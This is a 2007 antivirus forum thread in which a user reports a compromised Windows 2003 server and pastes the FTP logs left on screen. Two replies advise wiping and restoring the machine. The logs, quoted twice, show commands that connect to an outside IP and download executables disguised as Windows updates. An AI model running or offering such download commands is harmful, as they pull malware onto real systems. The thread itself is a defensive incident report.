Backdoor Trojan?

Backdoor Trojan?
Secure Home | Search | About
Login Password
Register Now! Lost Password?
 Microsoft Antivirus Discussions    Post an article   get this group's latest topics as an RSS feed add this group's latest topics to your My MSN content add this group's latest topics to your My Yahoo content add this group's latest topics to your Google content
Subject Author Date
Backdoor Trojan? JN 03-02-2007
Posted by JN on March 2, 2007, 11:12 am
If you were  Registered and logged in, you could reply and use other advanced thread options
On the screen of my windows 2003 Server, I found two Dos screens with the
information below:

It looks like somebody got access to it and downloaded some files. I have
unplugged that server from the internet.

What should I do next?

Thanks.

JN

ftp> open 70.52.54.95 13190

Connected to 70.52.54.95.

220 ROO HoneyPot POSTEDIN

ftp> user 1 1

230 Logged in

ftp> get wmupdate80585.exe

200 PORT Command success

150 Opening BINARY mode connection



ftp> open 70.52.54.95 13190

Connected to 70.52.54.95.

220 ROO HoneyPot POSTEDIN

ftp> user 1 1

331 Pass required

230 Logged in

ftp> get wmupdat48382.exe

200 PORT Command success

150 Opening BINARY mode connection





Posted by Malke on March 2, 2007, 1:33 pm
If you were  Registered and logged in, you could reply and use other advanced thread options
JN wrote:
> On the screen of my windows 2003 Server, I found two Dos screens with the
> information below:
>
> It looks like somebody got access to it and downloaded some files. I have
> unplugged that server from the internet.
>
> What should I do next?
>
> Thanks.
>
> JN
>
> ftp> open 70.52.54.95 13190
>
> Connected to 70.52.54.95.
>
> 220 ROO HoneyPot POSTEDIN
>
> ftp> user 1 1
>
> 230 Logged in
>
> ftp> get wmupdate80585.exe
>
> 200 PORT Command success
>
> 150 Opening BINARY mode connection
>
>
>
> ftp> open 70.52.54.95 13190
>
> Connected to 70.52.54.95.
>
> 220 ROO HoneyPot POSTEDIN
>
> ftp> user 1 1
>
> 331 Pass required
>
> 230 Logged in
>
> ftp> get wmupdat48382.exe
>
> 200 PORT Command success
>
> 150 Opening BINARY mode connection

What should you do next? You want the real, honest answer? Flatten that
server and apply your backup image. At the same time, you need to figure
out where your security fell down and fix that.


Malke
--
Elephant Boy Computers
www.elephantboycomputers.com
"Don't Panic!"
MS-MVP Windows - Shell/User

Posted by David H. Lipman on March 2, 2007, 4:57 pm
If you were  Registered and logged in, you could reply and use other advanced thread options

| JN wrote:
>> On the screen of my windows 2003 Server, I found two Dos screens with the
>> information below:
>>
>> It looks like somebody got access to it and downloaded some files. I have
>> unplugged that server from the internet.
>>
>> What should I do next?
>>
>> Thanks.
>>
>> JN
>>

< snip >

|
| What should you do next? You want the real, honest answer? Flatten that
| server and apply your backup image. At the same time, you need to figure
| out where your security fell down and fix that.
|
| Malke

Since this is a server, not a workstation, I am in 100% agreement with Malke.

When the server is recreated, you need to protect it better !


--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm



Similar ThreadsPosted
backdoor.trojan April 25, 2006, 1:43 pm
irc backdoor trojan May 9, 2008, 8:28 am
Strange trojan (?) Backdoor.Graybird September 16, 2005, 10:24 am
trojan horse backdoor irc/sdbot.myx December 15, 2005, 5:29 pm
trojan horse IRC/backdoor.sdbot.myx December 15, 2005, 5:35 pm
Trojan horse BackDoor.Generic3.EKW September 9, 2006, 10:14 pm
W32/Backdoor.KPI May 25, 2006, 7:22 pm
Backdoor.HackDefender July 14, 2005, 10:56 pm
Need help with backdoor.prorat October 20, 2005, 6:13 am
Anybody got a fix for BackDoor.Generic3.LRT? October 27, 2006, 11:44 pm

The site map in XML format XML site map

Contact Us | Privacy Policy